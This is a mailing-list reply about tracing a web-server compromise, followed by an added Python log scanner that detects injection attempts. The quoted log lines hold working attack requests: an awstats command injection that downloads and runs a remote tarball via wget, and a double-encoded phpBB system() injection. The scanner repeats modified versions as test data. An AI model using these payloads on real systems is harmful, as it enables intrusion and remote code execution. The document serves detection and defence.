On Sun, Jul 24, 2005 at 01:19:25PM +0200, Christoph Haas wrote:
> Since the process runs as "www-data" some kiddy has abused a web service
> on your server to download and run an external software. Look for
> suspicious log lines of your web server.

Yes ..

> Examples of hacks on our servers:
>
> 82.55.78.243 - - [26/Feb/2005:20:04:59 +0100] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.geocities.com%2fmadahack%2fa.tgz%3b%20tar%20zxf%20a.tgz%3b%20rm%20-f%20a.tgz%3b%20.%2fa%20%7c%20 HTTP/1.1" 200 422 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"
>
> 211-255-23-42.rev.krline.net - - [04/Dec/2004:17:43:06 +0100] "GET /phpbb/viewtopic.php?t=27&highlight=%2527%252esystem(chr(108)%252echr(115)%252echr(32)%252echr(45)%252echr(108)%252echr(97)%252echr(32)%252echr(47)%252echr(118)%252echr(97)%252echr(114)%252echr(47)%252echr(119)%252echr(119)%252echr(119))%252e%2527 HTTP/1.0" 200 28732 "-" "PHP/4.3.4"
>
> It should be rather easy finding signs of weird accesses like %20 or
> chr(). Also look for weird signs in /tmp.

Both of these attacks could be prevented by the use of mod_security, which
I'd recommend you look into using in the future if you have potentially
untrusted scripts running.

Steve
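The log-grepping Christoph suggests and Steve seconds (look for %20, chr() and friends in the access log), as an added example that is not part of the original thread and not code from either poster: a small Python scanner that parses Apache combined-format lines, percent-decodes each request until it stops changing (so the phpBB-style double encoding, %2527 -> %27 -> ', surfaces as a quote instead of hiding behind the second layer), and flags the indicators present in the two quoted attacks. The embedded log lines are constructed for this example (RFC 5737 addresses, a placeholder download host), modelled on the two entries in the post rather than copied from any real server.

```python
from __future__ import annotations

import re
from urllib.parse import unquote

# Apache "combined" log format, the format of the entries quoted in the post.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators checked against the *decoded* request target. Each is a
# (label, regex) pair; the labels are this example's own names.
INDICATORS = [
    # ';' and '|' chain shell commands (awstats configdir injection).
    # Caveat: ';' also appears in ';jsessionid=' URLs, so treat as triage.
    ("shell metacharacter in request", re.compile(r'[;|`]')),
    ("download tool in request", re.compile(r'\b(?:wget|curl)\b', re.I)),
    ("reference to /tmp", re.compile(r'(?:^|[\s;|=])/tmp\b')),
    # chr(NNN).chr(NNN) is the classic way to smuggle a string past filters.
    ("PHP chr() obfuscation", re.compile(r'chr\(\s*\d+\s*\)', re.I)),
    ("command execution call", re.compile(
        r'\b(?:system|exec|passthru|shell_exec|popen)\s*\(', re.I)),
    ("path traversal", re.compile(r'(?:^|/)\.\./')),
]


def decode_target(target: str, max_rounds: int = 3) -> tuple[str, int]:
    """Percent-decode until the string stops changing.

    Returns (decoded, rounds). rounds == 0 means no encoding at all,
    1 is ordinary encoding (%20 for a space), 2 or more means the request
    was double-encoded (%2527), which normal browsers do not produce.
    """
    current, rounds = target, 0
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current, rounds = decoded, rounds + 1
    return current, rounds


def analyse(line: str) -> dict | None:
    """Parse one access-log line; None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded, rounds = decode_target(m["target"])
    reasons = [label for label, rx in INDICATORS if rx.search(decoded)]
    if rounds > 1:
        reasons.append("double percent-encoding")
    return {
        "host": m["host"],
        "status": int(m["status"]),
        "target": m["target"],
        "decoded": decoded,
        "reasons": reasons,
        "suspicious": bool(reasons),
    }


def scan(lines: list[str]) -> list[dict]:
    """Return the analysed records for every line that tripped an indicator."""
    return [r for r in map(analyse, lines) if r and r["suspicious"]]


# Constructed sample log (not real traffic), modelled on the post's examples.
SAMPLE_LOG = [
    '198.51.100.7 - - [26/Feb/2005:19:58:01 +0100] "GET /index.html HTTP/1.1" '
    '200 1043 "-" "Mozilla/5.0"',
    # awstats configdir command injection: " | cd /tmp;wget ...;tar zxf ...; ./a | "
    '203.0.113.9 - - [26/Feb/2005:20:04:59 +0100] "GET /cgi-bin/awstats.pl?'
    'configdir=%20%7c%20cd%20%2ftmp%3bwget%20example.invalid%2fa.tgz%3b%20tar'
    '%20zxf%20a.tgz%3b%20.%2fa%20%7c%20 HTTP/1.1" 200 422 "-" "Mozilla/4.0"',
    # phpBB highlight injection, double-encoded: '.system(chr(108).chr(115)).'
    '203.0.113.44 - - [04/Dec/2004:17:43:06 +0100] "GET /phpbb/viewtopic.php?'
    't=27&highlight=%2527%252esystem(chr(108)%252echr(115))%252e%2527 HTTP/1.0" '
    '200 28732 "-" "PHP/4.3.4"',
    # benign: an ordinary %20 in a search term must not be flagged
    '198.51.100.8 - - [26/Feb/2005:20:10:12 +0100] "GET /search.php?'
    'q=debian%20security HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["host"]} {hit["status"]} {hit["decoded"]}')
        print("   ", "; ".join(hit["reasons"]))
```

Running it flags the awstats line (shell metacharacters, wget, /tmp) and the phpBB line (chr(), system(), double encoding) while leaving the two benign requests alone, which is the point of decoding first: grepping the raw log for chr( finds the phpBB hit, but grepping for ' or system( does not, because both are hidden behind %2527 and %252e. The decode-then-match step is also what a mod_security rule with a URL-decoding transformation does before its pattern runs, so the same indicators carry over to blocking rules once you deploy it.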